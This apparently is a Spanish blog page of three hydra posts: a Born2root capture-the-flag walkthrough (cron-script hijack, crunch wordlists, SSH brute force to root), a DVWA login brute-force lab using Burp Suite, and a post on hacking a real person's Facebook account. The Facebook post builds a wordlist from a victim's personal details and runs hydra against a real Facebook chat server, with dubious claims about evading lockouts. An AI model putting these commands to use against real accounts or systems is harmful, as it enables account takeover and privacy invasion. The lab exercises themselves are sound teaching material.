Mostrando entradas con la etiqueta hydra. Mostrar todas las entradas
Mostrando entradas con la etiqueta hydra. Mostrar todas las entradas

sábado, 21 de abril de 2018

Solución al reto Born2root

Hola amigos.

Hoy, vamos a ver cómo podemos resolver el reto born2root, descargable en https://www.vulnhub.com/entry/born2root-1,197/#

La dirección de la máquina víctima será 192.168.1.70

En primer lugar, escaneamos los puertos y vemos los servicios:

nmap -sS -sV -O 192.168.1.70



Bien, veamos la página web



Vemos que el correo de uno de ellos es martin@secretsec.com. Bien, eso significa, que los usuarios es posible que sean martin, hadi y jimmy.

Estudiaremos los directorios de la página web.





en el directorio /icons nos encontramos lo siguiente:



Nos llama la atención el fichero VDSoyuAXiO.txt. 

Nos lo descargamos.

Ponemos

chmod 600 VDSoyAXiO.txt

porque si no, nos saldrá un error como se muestra a continuación:



ssh -i VDSoyuAXiO.txt martin@192.168.1.70

(probamos martin por probar, si no lo fuese, serían o hadi o jimmy)



Introducimos cualquier contraseña



Si ponemos

nano /etc/crontab




/etc/crontab es un archivo que indica al sistema tareas que realizar automáticamente. Es decir, le puedes programar que, por ejemplo, todos los lunes, a las 17:30, haga algo.

Vemos que, cada cinco minutos, se ejecuta el script /tmp/sekurity.py para el usuario jimmy. ¿Y si cambiamos ese script por otro que sea nuestro?

Crearemos un script en python

nano /tmp/sekurity.py

Y ponemos:

import os
os.system(“chmod 777 -R /home/jimmy”)

guardamos y cerramos.

Con este código, tendremos permisos en el directorio /home/jimmy

chmod es el encargado de dar permisos en linux:
  • Permiso de lectura: 4
  • Permiso de escritura: 2
  • Permiso de ejecución: 1
Como queremos todos los permisos, 4+2+1 =7

Y ponemos un 7 para el usuario, un 7 para el grupo, y un 7 para el resto, con lo cual nos queda chmod 777

Ahora, ponemos un -R para indicar que se va a aplicar a todos los archivos y subcarpetas de /home/jimmy

Guardamos y cerramos.

Esperamos 5 minutos.



Y ya podemos entrar en el directorio de jimmy.
 
Vamos a preparar un diccionario para hadi.

En otra ventana ponemos

crunch 5 5 -t hadi% > hadi1.txt

crunch 6 6 -t hadi%% > hadi2.txt

crunch 7 7 -t hadi%%% > hadi3.txt

Unimos los archivos (concatenamos) de la siguiente manera:

cat hadi*.txt > hadi.txt

Y ya tenemos un diccionario de los tres anteriores.

Ahora, usamos la fuerza bruta.

hydra -l hadi -P hadi.txt 192.168.1.70 ssh



Iniciamos sesión


Y como contraseña hadi123




Probamos

su

Cuando pida la contraseña ponemos hadi123



Resulta que hadi es el administrador.

Y si vamos al directorio /root/, nos encontramos la flag.txt

cat flag.txt


viernes, 26 de mayo de 2017

Hackear facebook con hydra

Hola amigos.

Hoy vamos a ver cómo se puede hackear una cuenta de facebook como en la serie Mr. Robot.Salvo que en la serie, Elliot utiliza un programa creado por él.

En primer lugar, necesitamos un diccionario con los gustos, y todos los datos que podamos reunir de nuestra víctima.

En segundo lugar, visitaremos el perfil de la misma, será en plan facebook.com/mengano.fulano

Ahora, hacemos ping al chat de facebook




Lo siguente, es hacer nmap al chat de facebook



Nos fijamos en el puerto 5222, es un cliente xmpp. Este cliente es el cliente del chat.

Ahora, realizaremos un ataque con hydra a esa IP con ese puerto. La razón de que hayamos elegido el chat es, porque de esa manera, no nos banean tras unos intentos.

hydra -s 5222 -l mengano.fulano -P diccionario_contraseñas -t 16 173.252.88.131 xmpp



viernes, 9 de septiembre de 2016

Ataque a fuerza bruta con hydra

Hola amigos.

En este caso vamos a hacer un ataque fuerza bruta para averiguar el usuario y la contraseña de una página web.

Usaremos la distribución metasploitable2, en su apartado dvwa, que es un servidor web con distintas vulnerabilidades. Para ello es necesario acceder a la ip de la máquina e ir al enlace dvwa. Y cuando nos salga en login, ponemos admin como usuario y password como contraseña (si váis hacia abajo, tenéis esta información).

Nos iremos a la pestaña bruteforce



Abriremos burpsuite



Burpsuite es un proxy web que, a medida que vamos navegando, nos va mostrando los parámetros que va utilizando. Para utilizarlo, deberemos, además de abrirlo, configurar el navegador para que lo utilice como proxy, para ello deberemos ir a Open menú (las tres rayitas que hay a la derecha, una debajo de otra) → Preferencias → Avanzadas → Red → Configuraciones → Configuración manual de proxy: http proxy: 127.0.0.1 puerto 8080.



Si escribimos cualquier cosa en el usuario y en la contraseña y miramos en la pestaña poxy → intercept de Burpsuite:



Bien, esos son los parámetros que se envían al servidor web. Para que le lleguen, le debemos permitir el paso pulsando el botón forward.



Por supuesto, el usuario y la contraseña son incorrectos.

Usaremos hydra en este formato para sacar ambos. Usaremos este formato.

hydra 192.168.1.133 -v http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=high; PHPSESSID=329be075ec787d0c7967483638ca25fa" -L usuarios -P top500passwords-2008